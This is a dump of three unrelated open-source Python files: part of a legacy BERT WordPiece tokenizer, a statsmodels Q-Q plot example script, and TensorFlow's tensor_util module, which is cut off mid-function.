        # Size of the base vocabulary (without added tokens).
        return len(self.vocab)

    def get_vocab(self):
        """Return the full token->id mapping, including tokens added after loading."""
        return dict(self.vocab, **self.added_tokens_encoder)

    def _tokenize(self, text, split_special_tokens=False):
        """Tokenize `text`: basic tokenization (if enabled) followed by WordPiece."""
        split_tokens = []
        if self.do_basic_tokenize:
            for token in self.basic_tokenizer.tokenize(
                text, never_split=self.all_special_tokens if not split_special_tokens else None
            ):
                # If the token is part of the never_split set
                if token in self.basic_tokenizer.never_split:
                    split_tokens.append(token)
                else:
                    split_tokens += self.wordpiece_tokenizer.tokenize(token)
        else:
            split_tokens = self.wordpiece_tokenizer.tokenize(text)
        return split_tokens

    def _convert_token_to_id(self, token):
        """Converts a token (str) in an id using the vocab."""
        return self.vocab.get(token, self.vocab.get(self.unk_token))

    def _convert_id_to_token(self, index):
        """Converts an index (integer) in a token (str) using the vocab."""
        return self.ids_to_tokens.get(index, self.unk_token)

    def convert_tokens_to_string(self, tokens):
        """Converts a sequence of tokens (string) in a single string."""
        # Undo WordPiece by removing the "##" continuation markers.
        out_string = " ".join(tokens).replace(" ##", "").strip()
        return out_string

    def build_inputs_with_special_tokens(
        self, token_ids_0: list[int], token_ids_1: list[int] | None = None
    ) -> list[int]:
        """
        Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
        adding special tokens. A BERT sequence has the following format:
        - single sequence: `[CLS] X [SEP]`
        - pair of sequences: `[CLS] A [SEP] B [SEP]`
        Args:
            token_ids_0 (`List[int]`):
                List of IDs to which the special tokens will be added.
            token_ids_1 (`List[int]`, *optional*):
                Optional second list of IDs for sequence pairs.
        Returns:
            `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
        """
        if token_ids_1 is None:
            return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        cls = [self.cls_token_id]
        sep = [self.sep_token_id]
        return cls + token_ids_0 + sep + token_ids_1 + sep

    def get_special_tokens_mask(
        self, token_ids_0: list[int], token_ids_1: list[int] | None = None, already_has_special_tokens: bool = False
    ) -> list[int]:
        """
        Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
        special tokens using the tokenizer `prepare_for_model` method.
        Args:
            token_ids_0 (`List[int]`):
                List of IDs.
            token_ids_1 (`List[int]`, *optional*):
                Optional second list of IDs for sequence pairs.
            already_has_special_tokens (`bool`, *optional*, defaults to `False`):
                Whether or not the token list is already formatted with special tokens for the model.
        Returns:
            `List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
        """
        if already_has_special_tokens:
            return super().get_special_tokens_mask(
                token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
            )
        # Mask matches build_inputs_with_special_tokens: [CLS] A [SEP] (B [SEP]).
        if token_ids_1 is not None:
            return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
        return [1] + ([0] * len(token_ids_0)) + [1]

    def save_vocabulary(self, save_directory: str, filename_prefix: str | None = None) -> tuple[str]:
        """Write the vocabulary, one token per line in id order, and return the file path.

        `save_directory` may be a directory (file is named from VOCAB_FILES_NAMES)
        or a full file path.
        """
        index = 0
        if os.path.isdir(save_directory):
            vocab_file = os.path.join(
                save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
            )
        else:
            vocab_file = (filename_prefix + "-" if filename_prefix else "") + save_directory
        with open(vocab_file, "w", encoding="utf-8") as writer:
            for token, token_index in sorted(self.vocab.items(), key=lambda kv: kv[1]):
                # Gaps in the id sequence would make the saved line numbers
                # disagree with the original ids; warn but keep writing.
                if index != token_index:
                    logger.warning(
                        f"Saving vocabulary to {vocab_file}: vocabulary indices are not consecutive."
                        " Please check that the vocabulary is not corrupted!"
                    )
                    index = token_index
                writer.write(token + "\n")
                index += 1
        return (vocab_file,)
class BasicTokenizer:
    """
    Performs the pre-WordPiece tokenization steps: text cleanup, optional
    lower-casing and accent stripping, CJK-character isolation, and
    punctuation splitting.

    Args:
        do_lower_case (`bool`, *optional*, defaults to `True`):
            Whether or not to lowercase the input when tokenizing.
        never_split (`Iterable`, *optional*):
            Tokens that must never be split; only has an effect when
            `do_basic_tokenize=True`.
        tokenize_chinese_chars (`bool`, *optional*, defaults to `True`):
            Whether to surround CJK ideographs with spaces. Should likely be
            deactivated for Japanese (see
            https://github.com/huggingface/transformers/issues/328).
        strip_accents (`bool`, *optional*):
            Whether to strip all accents. If unspecified, this is determined
            by the value of `do_lower_case` (as in the original BERT).
        do_split_on_punc (`bool`, *optional*, defaults to `True`):
            Whether to split tokens at punctuation characters; disabling lets
            later tokenization see full words such as contractions.
    """

    def __init__(
        self,
        do_lower_case=True,
        never_split=None,
        tokenize_chinese_chars=True,
        strip_accents=None,
        do_split_on_punc=True,
    ):
        if never_split is None:
            never_split = []
        self.do_lower_case = do_lower_case
        self.never_split = set(never_split)
        self.tokenize_chinese_chars = tokenize_chinese_chars
        self.strip_accents = strip_accents
        self.do_split_on_punc = do_split_on_punc

    def tokenize(self, text, never_split=None):
        """
        Run basic tokenization on `text` (sub-word splitting is done later by
        WordpieceTokenizer).

        Args:
            never_split (`List[str]`, *optional*)
                Extra tokens to protect from splitting, merged with the
                instance-level set. Kept for backward compatibility; the base
                tokenizer class now handles this directly.
        """
        # union() leaves self.never_split untouched and builds a merged set.
        protected = self.never_split.union(set(never_split)) if never_split else self.never_split
        text = self._clean_text(text)
        # Space out CJK ideographs (added Nov 2018 for the multilingual and
        # Chinese models; harmless for English vocabularies).
        if self.tokenize_chinese_chars:
            text = self._tokenize_chinese_chars(text)
        # NFC-normalize so equal characters with different codepoint sequences
        # compare equal.
        normalized = unicodedata.normalize("NFC", text)
        pieces = []
        for word in whitespace_tokenize(normalized):
            if word not in protected:
                if self.do_lower_case:
                    word = word.lower()
                    if self.strip_accents is not False:
                        word = self._run_strip_accents(word)
                elif self.strip_accents:
                    word = self._run_strip_accents(word)
            pieces.extend(self._run_split_on_punc(word, protected))
        return whitespace_tokenize(" ".join(pieces))

    def _run_strip_accents(self, text):
        """Remove combining marks (category Mn) after NFD decomposition."""
        decomposed = unicodedata.normalize("NFD", text)
        return "".join(ch for ch in decomposed if unicodedata.category(ch) != "Mn")

    def _run_split_on_punc(self, text, never_split=None):
        """Split `text` at punctuation, each punctuation char becoming its own token."""
        if not self.do_split_on_punc or (never_split is not None and text in never_split):
            return [text]
        groups = []
        word_open = False
        for ch in text:
            if _is_punctuation(ch):
                # Punctuation stands alone and terminates the current word.
                groups.append([ch])
                word_open = False
            else:
                if not word_open:
                    groups.append([])
                    word_open = True
                groups[-1].append(ch)
        return ["".join(group) for group in groups]

    def _tokenize_chinese_chars(self, text):
        """Surround every CJK ideograph with spaces."""
        out = []
        for ch in text:
            if self._is_chinese_char(ord(ch)):
                out.extend((" ", ch, " "))
            else:
                out.append(ch)
        return "".join(out)

    def _is_chinese_char(self, cp):
        """Checks whether CP is the codepoint of a CJK character."""
        # "CJK character" here means the CJK Unified Ideographs blocks:
        # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
        # These blocks do NOT include Hangul, Hiragana or Katakana — those
        # scripts write space-separated words and need no special handling.
        cjk_ranges = (
            (0x4E00, 0x9FFF),
            (0x3400, 0x4DBF),
            (0x20000, 0x2A6DF),
            (0x2A700, 0x2B73F),
            (0x2B740, 0x2B81F),
            (0x2B820, 0x2CEAF),
            (0xF900, 0xFAFF),
            (0x2F800, 0x2FA1F),
        )
        return any(lo <= cp <= hi for lo, hi in cjk_ranges)

    def _clean_text(self, text):
        """Drop NUL/replacement/control characters and map whitespace to plain spaces."""
        cleaned = []
        for ch in text:
            code = ord(ch)
            if code == 0 or code == 0xFFFD or _is_control(ch):
                continue
            cleaned.append(" " if _is_whitespace(ch) else ch)
        return "".join(cleaned)
class WordpieceTokenizer:
    """Runs WordPiece tokenization."""

    def __init__(self, vocab, unk_token, max_input_chars_per_word=100):
        # vocab: mapping of wordpiece -> id; only membership tests are used here.
        self.vocab = vocab
        self.unk_token = unk_token
        self.max_input_chars_per_word = max_input_chars_per_word

    def tokenize(self, text):
        """
        Split `text` into word pieces with a greedy longest-match-first scan
        over the vocabulary.

        For example, `input = "unaffable"` will return as output
        `["un", "##aff", "##able"]`.

        Args:
            text: A single token or whitespace separated tokens. This should
                have already been passed through *BasicTokenizer*.

        Returns:
            A list of wordpiece tokens.
        """
        output_tokens = []
        for word in whitespace_tokenize(text):
            chars = list(word)
            # Overlong words are mapped straight to the unknown token.
            if len(chars) > self.max_input_chars_per_word:
                output_tokens.append(self.unk_token)
                continue
            pieces = []
            start = 0
            failed = False
            while start < len(chars):
                # Greedily take the longest vocab entry that starts at `start`;
                # non-initial pieces carry the "##" continuation prefix.
                end = len(chars)
                match = None
                while start < end:
                    candidate = "".join(chars[start:end])
                    if start > 0:
                        candidate = "##" + candidate
                    if candidate in self.vocab:
                        match = candidate
                        break
                    end -= 1
                if match is None:
                    # No piece fits at this position: the whole word is unknown.
                    failed = True
                    break
                pieces.append(match)
                start = end
            if failed:
                output_tokens.append(self.unk_token)
            else:
                output_tokens.extend(pieces)
        return output_tokens
__all__ = ["BasicTokenizer", "BertTokenizerLegacy", "WordpieceTokenizer"]
|
python
|
github
|
https://github.com/huggingface/transformers
|
src/transformers/models/bert/tokenization_bert_legacy.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 06 05:32:15 2012

Author: Josef Perktold
edited by: Paul Hobson (2012-08-19)

Demonstrates statsmodels Q-Q plotting: the `qqplot` convenience function on
OLS residuals under various `line`/`fit` options, then the newer ProbPlot
class for comparing two samples (Q-Q, P-P and exceedance plots).
"""
# example with the new ProbPlot class
from matplotlib import pyplot as plt
import numpy as np
from scipy import stats
import statsmodels.api as sm
# Fit OLS on the Longley dataset (example from the qqplot docstring) and use
# its residuals as the sample whose normality is inspected below.
data = sm.datasets.longley.load(as_pandas=False)
data.exog = sm.add_constant(data.exog, prepend=True)
mod_fit = sm.OLS(data.endog, data.exog).fit()
res = mod_fit.resid
left = -1.8  # x coordinate for the annotation text inserted in each panel
fig = plt.figure()
# Panel 1: default qqplot, no reference line.
ax = fig.add_subplot(2, 2, 1)
sm.graphics.qqplot(res, ax=ax)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, 'no keywords', verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
# Panel 2: standardized reference line.
ax = fig.add_subplot(2, 2, 2)
sm.graphics.qqplot(res, line='s', ax=ax)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "line='s'", verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
# Panel 3: 45-degree line with fitted location/scale.
ax = fig.add_subplot(2, 2, 3)
sm.graphics.qqplot(res, line='45', fit=True, ax=ax)
ax.set_xlim(-2, 2)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "line='45', \nfit=True", verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
# Panel 4: same, but against a Student-t reference distribution.
ax = fig.add_subplot(2, 2, 4)
sm.graphics.qqplot(res, dist=stats.t, line='45', fit=True, ax=ax)
ax.set_xlim(-2, 2)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "dist=stats.t, \nline='45', \nfit=True",
              verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
fig.tight_layout()
plt.gcf()
# Two synthetic normal samples compared against each other via ProbPlot.
x = np.random.normal(loc=8.25, scale=3.5, size=37)
y = np.random.normal(loc=8.00, scale=3.25, size=37)
pp_x = sm.ProbPlot(x, fit=True)
pp_y = sm.ProbPlot(y, fit=True)
# probability of exceedance
fig2 = pp_x.probplot(exceed=True)
# compare x quantiles to y quantiles
fig3 = pp_x.qqplot(other=pp_y, line='45')
# same as above with probabilities/percentiles
fig4 = pp_x.ppplot(other=pp_y, line='45')
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities to create TensorProtos."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.python.framework import tensor_shape
from tensorflow.python.util import compat
# TODO(opensource): Add support for pyx_library in the open-source build.
# For now, we use the slow versions that fast_tensor_util replaces.
# pylint: disable=g-import-not-at-top
try:
from tensorflow.python.framework import fast_tensor_util
_FAST_TENSOR_UTIL_AVAILABLE = True
except ImportError:
_FAST_TENSOR_UTIL_AVAILABLE = False
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
# pylint: enable=g-import-not-at-top
def ExtractBitsFromFloat16(x):
  """Return the IEEE-754 binary16 bit pattern of `x` as a Python int.

  Used to populate TensorProto.half_val, which stores raw uint16 bits.
  """
  # np.asscalar was deprecated in NumPy 1.16 and removed in 1.23; .item()
  # is the supported replacement and yields the same Python scalar.
  return np.asarray(x, dtype=np.float16).view(np.uint16).item()
def SlowAppendFloat16ArrayToTensorProto(tensor_proto, proto_values):
  """Append float16 values to `tensor_proto.half_val` as raw uint16 bit patterns."""
  bits = [ExtractBitsFromFloat16(v) for v in proto_values]
  tensor_proto.half_val.extend(bits)
# Dispatch table mapping numpy scalar types to functions that append a flat
# sequence of values onto the matching repeated field of a TensorProto.
# When the compiled fast_tensor_util extension imported above is available,
# its implementations are used; otherwise the pure-Python Slow* fallbacks
# defined in the else branch are used.
# NOTE(review): the np.object / np.bool aliases used below were removed in
# NumPy 1.24; this module assumes an older NumPy.
if _FAST_TENSOR_UTIL_AVAILABLE:
  _NP_TO_APPEND_FN = {
      # TODO(sesse): We should have a
      # fast_tensor_util.AppendFloat16ArrayToTensorProto,
      # but it seems np.float16_t doesn't exist?
      np.float16: SlowAppendFloat16ArrayToTensorProto,
      np.float32: fast_tensor_util.AppendFloat32ArrayToTensorProto,
      np.float64: fast_tensor_util.AppendFloat64ArrayToTensorProto,
      np.int32: fast_tensor_util.AppendInt32ArrayToTensorProto,
      np.int64: fast_tensor_util.AppendInt64ArrayToTensorProto,
      np.uint8: fast_tensor_util.AppendUInt8ArrayToTensorProto,
      np.uint16: fast_tensor_util.AppendUInt16ArrayToTensorProto,
      np.int8: fast_tensor_util.AppendInt8ArrayToTensorProto,
      np.int16: fast_tensor_util.AppendInt16ArrayToTensorProto,
      np.complex64: fast_tensor_util.AppendComplex64ArrayToTensorProto,
      np.complex128: fast_tensor_util.AppendComplex128ArrayToTensorProto,
      np.object: fast_tensor_util.AppendObjectArrayToTensorProto,
      np.bool: fast_tensor_util.AppendBoolArrayToTensorProto,
      # Quantized dtypes are stored in the plain int8/uint8/int32 fields.
      dtypes.qint8.as_numpy_dtype:
      fast_tensor_util.AppendInt8ArrayToTensorProto,
      dtypes.quint8.as_numpy_dtype:
      fast_tensor_util.AppendUInt8ArrayToTensorProto,
      dtypes.qint16.as_numpy_dtype:
      fast_tensor_util.AppendInt8ArrayToTensorProto,
      dtypes.quint16.as_numpy_dtype:
      fast_tensor_util.AppendUInt8ArrayToTensorProto,
      dtypes.qint32.as_numpy_dtype:
      fast_tensor_util.AppendInt32ArrayToTensorProto,
      # NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
  }
else:
  # Pure-Python fallbacks: each converts the numpy scalars to Python scalars
  # and extends the TensorProto field appropriate for its dtype family.
  def SlowAppendFloat32ArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.float_val.extend([np.asscalar(x) for x in proto_values])
  def SlowAppendFloat64ArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.double_val.extend([np.asscalar(x) for x in proto_values])
  def SlowAppendIntArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.int_val.extend([np.asscalar(x) for x in proto_values])
  # Quantized values arrive as 1-element tuples; element 0 holds the number.
  def SlowAppendQIntArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.int_val.extend([np.asscalar(x[0]) for x in proto_values])
  def SlowAppendInt64ArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.int64_val.extend([np.asscalar(x) for x in proto_values])
  # Complex values are flattened as alternating real/imag components.
  def SlowAppendComplex64ArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.scomplex_val.extend([np.asscalar(v)
                                      for x in proto_values
                                      for v in [x.real, x.imag]])
  def SlowAppendComplex128ArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.dcomplex_val.extend([np.asscalar(v)
                                      for x in proto_values
                                      for v in [x.real, x.imag]])
  def SlowAppendObjectArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.string_val.extend([compat.as_bytes(x) for x in proto_values])
  def SlowAppendBoolArrayToTensorProto(tensor_proto, proto_values):
    tensor_proto.bool_val.extend([np.asscalar(x) for x in proto_values])
  _NP_TO_APPEND_FN = {
      np.float16: SlowAppendFloat16ArrayToTensorProto,
      np.float32: SlowAppendFloat32ArrayToTensorProto,
      np.float64: SlowAppendFloat64ArrayToTensorProto,
      np.int32: SlowAppendIntArrayToTensorProto,
      np.int64: SlowAppendInt64ArrayToTensorProto,
      np.uint8: SlowAppendIntArrayToTensorProto,
      np.uint16: SlowAppendIntArrayToTensorProto,
      np.int8: SlowAppendIntArrayToTensorProto,
      np.int16: SlowAppendIntArrayToTensorProto,
      np.complex64: SlowAppendComplex64ArrayToTensorProto,
      np.complex128: SlowAppendComplex128ArrayToTensorProto,
      np.object: SlowAppendObjectArrayToTensorProto,
      np.bool: SlowAppendBoolArrayToTensorProto,
      dtypes.qint8.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
      dtypes.quint8.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
      dtypes.qint16.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
      dtypes.quint16.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
      dtypes.qint32.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
      # NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
  }
def GetFromNumpyDTypeDict(dtype_dict, dtype):
  """Look up `dtype` in `dtype_dict` by equality scan, returning None on a miss.

  A plain dtype_dict.get(dtype) always returns None here: the keys (numpy
  type objects) do not hash the same as dtype instances, so each key must be
  compared for equality instead.
  """
  for key, val in dtype_dict.items():
    if key == dtype:
      return val
  return None
def GetNumpyAppendFn(dtype):
  """Return the proto-append function for `dtype`, or None if unsupported."""
  # numpy string dtypes are variable length, so comparing `dtype` against a
  # single constant cannot identify them (np.string does not exist); the
  # underlying dtype.type must be inspected instead.
  if dtype.type in (np.string_, np.unicode_):
    if _FAST_TENSOR_UTIL_AVAILABLE:
      return fast_tensor_util.AppendObjectArrayToTensorProto
    return SlowAppendObjectArrayToTensorProto
  return GetFromNumpyDTypeDict(_NP_TO_APPEND_FN, dtype)
def TensorShapeProtoToList(shape):
  """Convert a TensorShape to a list.

  Args:
    shape: A TensorShapeProto.

  Returns:
    List of integers representing the dimensions of the tensor.
  """
  sizes = []
  for dim in shape.dim:
    sizes.append(dim.size)
  return sizes
def _GetDenseDimensions(list_of_lists):
"""Returns the inferred dense dimensions of a list of lists."""
if not isinstance(list_of_lists, (list, tuple)):
return []
elif not list_of_lists:
return [0]
else:
return [len(list_of_lists)] + _GetDenseDimensions(list_of_lists[0])
def _FlattenToStrings(nested_strings):
if isinstance(nested_strings, (list, tuple)):
for inner in nested_strings:
for flattened_string in _FlattenToStrings(inner):
yield flattened_string
else:
yield nested_strings
# Dtypes whose values may be serialized compactly into the raw
# `tensor_content` bytes field instead of the per-element repeated fields.
_TENSOR_CONTENT_TYPES = frozenset([
    dtypes.float32, dtypes.float64, dtypes.int32, dtypes.uint8, dtypes.int16,
    dtypes.int8, dtypes.int64, dtypes.qint8, dtypes.quint8, dtypes.qint16,
    dtypes.quint16, dtypes.qint32,
])
class _Message(object):
def __init__(self, message):
self._message = message
def __repr__(self):
return self._message
def _FirstNotNone(l):
for x in l:
if x is not None:
if isinstance(x, ops.Tensor):
return _Message("list containing Tensors")
else:
return x
return None
def _NotNone(v):
if v is None:
return _Message("None")
else:
return v
def _FilterTuple(v):
  """Filter used for quantized dtypes, whose innermost values must be tuples.

  Returns an offending (non-tuple-wrapped) element if one is found, else None.
  """
  # A bare scalar where nesting was required is itself the mismatch.
  if not isinstance(v, (list, tuple)):
    return v
  # A flat tuple of scalars is the accepted innermost form.
  if isinstance(v, tuple):
    if not any(isinstance(x, (list, tuple)) for x in v):
      return None
  # A flat *list* of scalars is a mismatch: report its first element.
  if isinstance(v, list):
    if not any(isinstance(x, (list, tuple)) for x in v):
      return _FirstNotNone([None if isinstance(x, (list, tuple)) else x for x in v])
  # Otherwise recurse into the nested structure.
  return _FirstNotNone([_FilterTuple(x) for x in v])
def _FilterInt(v):
  """Return a non-integral element found in `v` (recursively), else None."""
  if isinstance(v, (list, tuple)):
    return _FirstNotNone([_FilterInt(x) for x in v])
  if isinstance(v, compat.integral_types):
    return None
  return _NotNone(v)
def _FilterFloat(v):
  """Return a non-real-number element found in `v` (recursively), else None."""
  if isinstance(v, (list, tuple)):
    return _FirstNotNone([_FilterFloat(x) for x in v])
  if isinstance(v, compat.real_types):
    return None
  return _NotNone(v)
def _FilterComplex(v):
  """Return a non-complex-number element found in `v` (recursively), else None."""
  if isinstance(v, (list, tuple)):
    return _FirstNotNone([_FilterComplex(x) for x in v])
  if isinstance(v, compat.complex_types):
    return None
  return _NotNone(v)
def _FilterStr(v):
  """Return a non-string element found in `v` (recursively), else None."""
  if isinstance(v, (list, tuple)):
    return _FirstNotNone([_FilterStr(x) for x in v])
  return None if isinstance(v, compat.bytes_or_text_types) else _NotNone(v)
def _FilterBool(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterBool(x) for x in v])
return None if isinstance(v, bool) else _NotNone(v)
def _FilterNotTensor(v):
  """Return str(v) for a Tensor found in `v` (recursively), else None."""
  if isinstance(v, (list, tuple)):
    return _FirstNotNone([_FilterNotTensor(x) for x in v])
  if isinstance(v, ops.Tensor):
    return str(v)
  return None
# Maps each TF dtype to the filter functions _AssertCompatible applies to
# spot incompatible elements in a python value. Quantized dtypes also run
# _FilterTuple because their values must be fed as tuples.
_TF_TO_IS_OK = {
    dtypes.bool: [_FilterBool],
    dtypes.complex128: [_FilterComplex],
    dtypes.complex64: [_FilterComplex],
    dtypes.float32: [_FilterFloat],
    dtypes.float64: [_FilterFloat],
    dtypes.int16: [_FilterInt],
    dtypes.int32: [_FilterInt],
    dtypes.int64: [_FilterInt],
    dtypes.int8: [_FilterInt],
    dtypes.qint16: [_FilterInt, _FilterTuple],
    dtypes.qint32: [_FilterInt, _FilterTuple],
    dtypes.qint8: [_FilterInt, _FilterTuple],
    dtypes.quint16: [_FilterInt, _FilterTuple],
    dtypes.quint8: [_FilterInt, _FilterTuple],
    dtypes.string: [_FilterStr],
    dtypes.uint16: [_FilterInt],
    dtypes.uint8: [_FilterInt],
}
def _AssertCompatible(values, dtype):
  """Raise TypeError if `values` contains an element incompatible with `dtype`."""
  # Unknown dtypes fall back to rejecting Tensor elements only.
  fn_list = _TF_TO_IS_OK.get(dtype, [_FilterNotTensor])
  mismatch = _FirstNotNone([fn(values) for fn in fn_list])
  if mismatch is None:
    return
  if dtype is None:
    raise TypeError("List of Tensors when single Tensor expected")
  raise TypeError("Expected %s, got %s of type '%s' instead." %
                  (dtype.name, repr(mismatch), type(mismatch).__name__))
def make_tensor_proto(values, dtype=None, shape=None, verify_shape=False):
  """Create a TensorProto.
  Args:
    values: Values to put in the TensorProto.
    dtype: Optional tensor_pb2 DataType value.
    shape: List of integers representing the dimensions of tensor.
    verify_shape: Boolean that enables verification of a shape of values.
  Returns:
    A TensorProto. Depending on the type, it may contain data in the
    "tensor_content" attribute, which is not directly useful to Python programs.
    To access the values you should convert the proto back to a numpy ndarray
    with tensor_util.MakeNdarray(proto).
  Raises:
    TypeError: if unsupported types are provided.
    ValueError: if arguments have inappropriate values or if verify_shape is
      True and shape of values is not equals to a shape from the argument.
  make_tensor_proto accepts "values" of a python scalar, a python list, a
  numpy ndarray, or a numpy scalar.
  If "values" is a python scalar or a python list, make_tensor_proto
  first convert it to numpy ndarray. If dtype is None, the
  conversion tries its best to infer the right numpy data
  type. Otherwise, the resulting numpy array has a compatible data
  type with the given dtype.
  In either case above, the numpy ndarray (either the caller provided
  or the auto converted) must have the compatible type with dtype.
  make_tensor_proto then converts the numpy array to a tensor proto.
  If "shape" is None, the resulting tensor proto represents the numpy
  array precisely.
  Otherwise, "shape" specifies the tensor's shape and the numpy array
  can not have more elements than what "shape" specifies.
  """
  if dtype:
    dtype = dtypes.as_dtype(dtype)
  is_quantized = (dtype in [dtypes.qint8, dtypes.quint8, dtypes.qint16,
                            dtypes.quint16, dtypes.qint32])
  # We first convert value to a numpy array or scalar.
  if isinstance(values, (np.ndarray, np.generic)):
    if dtype:
      nparray = values.astype(dtype.as_numpy_dtype)
    else:
      nparray = values
  elif callable(getattr(values, "__array__", None)):
    # If a class has the __array__ method, then it is possible to convert
    # to numpy array.
    nparray = np.asarray(values, dtype=dtype)
  else:
    if values is None:
      raise ValueError("None values not supported.")
    # if dtype is provided, forces numpy array to be the type
    # provided if possible.
    if dtype and dtype.is_numpy_compatible:
      np_dt = dtype.as_numpy_dtype
    else:
      np_dt = None
    # Zero-element shapes skip element validation entirely.
    if np.prod(shape) == 0:
      nparray = np.empty(shape, dtype=np_dt)
    else:
      _AssertCompatible(values, dtype)
      nparray = np.array(values, dtype=np_dt)
      # We need to pass in quantized values as tuples, so don't apply the shape
      # check to them.
      if (list(nparray.shape) != _GetDenseDimensions(values) and
          not is_quantized):
        raise ValueError("""Argument must be a dense tensor: %s"""
                         """ - got shape %s, but wanted %s.""" % (
                             values, list(nparray.shape),
                             _GetDenseDimensions(values)))
    # python/numpy default float type is float64. We prefer float32 instead.
    if (nparray.dtype == np.float64) and dtype is None:
      nparray = nparray.astype(np.float32)
    # python/numpy default int type is int64. We prefer int32 instead.
    elif (nparray.dtype == np.int64) and dtype is None:
      downcasted_array = nparray.astype(np.int32)
      # Do not down cast if it leads to precision loss.
      if np.array_equal(downcasted_array, nparray):
        nparray = downcasted_array
  # if dtype is provided, it must be compatible with what numpy
  # conversion says.
  numpy_dtype = dtypes.as_dtype(nparray.dtype)
  if numpy_dtype is None:
    raise TypeError("Unrecognized data type: %s" % nparray.dtype)
  # If dtype was specified and is a quantized type, we convert
  # numpy_dtype back into the quantized version.
  if is_quantized:
    numpy_dtype = dtype
  if dtype is not None and (not hasattr(dtype, "base_dtype") or
                            dtype.base_dtype != numpy_dtype.base_dtype):
    raise TypeError("Incompatible types: %s vs. %s" % (dtype, nparray.dtype))
  # If shape is not given, get the shape from the numpy array.
  if shape is None:
    shape = nparray.shape
    is_same_size = True
    shape_size = nparray.size
  else:
    shape = [int(dim) for dim in shape]
    shape_size = np.prod(shape)
    is_same_size = shape_size == nparray.size
    if verify_shape:
      if not nparray.shape == tuple(shape):
        raise TypeError("Expected Tensor's shape: %s, got %s." %
                        (tuple(shape), nparray.shape))
    if nparray.size > shape_size:
      raise ValueError(
          "Too many elements provided. Needed at most %d, but received %d" %
          (shape_size, nparray.size))
  tensor_proto = tensor_pb2.TensorProto(
      dtype=numpy_dtype.as_datatype_enum,
      tensor_shape=tensor_shape.as_shape(shape).as_proto())
  # Fast path: pack the raw bytes straight into tensor_content when the
  # element count matches the declared shape and the dtype supports it.
  if is_same_size and numpy_dtype in _TENSOR_CONTENT_TYPES and shape_size > 1:
    if nparray.size * nparray.itemsize >= (1 << 31):
      raise ValueError(
          "Cannot create a tensor proto whose content is larger than 2GB.")
    tensor_proto.tensor_content = nparray.tostring()
    return tensor_proto
  # If we were not given values as a numpy array, compute the proto_values
  # from the given values directly, to avoid numpy trimming nulls from the
  # strings. Since values could be a list of strings, or a multi-dimensional
  # list of lists that might or might not correspond to the given shape,
  # we flatten it conservatively.
  if numpy_dtype == dtypes.string and not isinstance(values, np.ndarray):
    proto_values = _FlattenToStrings(values)
    # At this point, values may be a list of objects that we could not
    # identify a common type for (hence it was inferred as
    # np.object/dtypes.string). If we are unable to convert it to a
    # string, we raise a more helpful error message.
    #
    # Ideally, we'd be able to convert the elements of the list to a
    # common type, but this type inference requires some thinking and
    # so we defer it for now.
    try:
      str_values = [compat.as_bytes(x) for x in proto_values]
    except TypeError:
      raise TypeError("Failed to convert object of type %s to Tensor. "
                      "Contents: %s. Consider casting elements to a "
                      "supported type." % (type(values), values))
    tensor_proto.string_val.extend(str_values)
    return tensor_proto
  # TensorFlow expects C order (a.k.a., eigen row major).
  proto_values = nparray.ravel()
  append_fn = GetNumpyAppendFn(proto_values.dtype)
  if append_fn is None:
    raise TypeError("Element type not supported in TensorProto: %s" %
                    numpy_dtype.name)
  append_fn(tensor_proto, proto_values)
  return tensor_proto
def MakeNdarray(tensor):
  """Create a numpy ndarray from a tensor.

  Create a numpy ndarray with the same shape and data as the tensor.

  Args:
    tensor: A TensorProto.

  Returns:
    A numpy array with the tensor contents.

  Raises:
    TypeError: if tensor has unsupported type.
  """
  shape = [d.size for d in tensor.tensor_shape.dim]
  num_elements = np.prod(shape)
  tensor_dtype = dtypes.as_dtype(tensor.dtype)
  dtype = tensor_dtype.as_numpy_dtype
  if tensor.tensor_content:
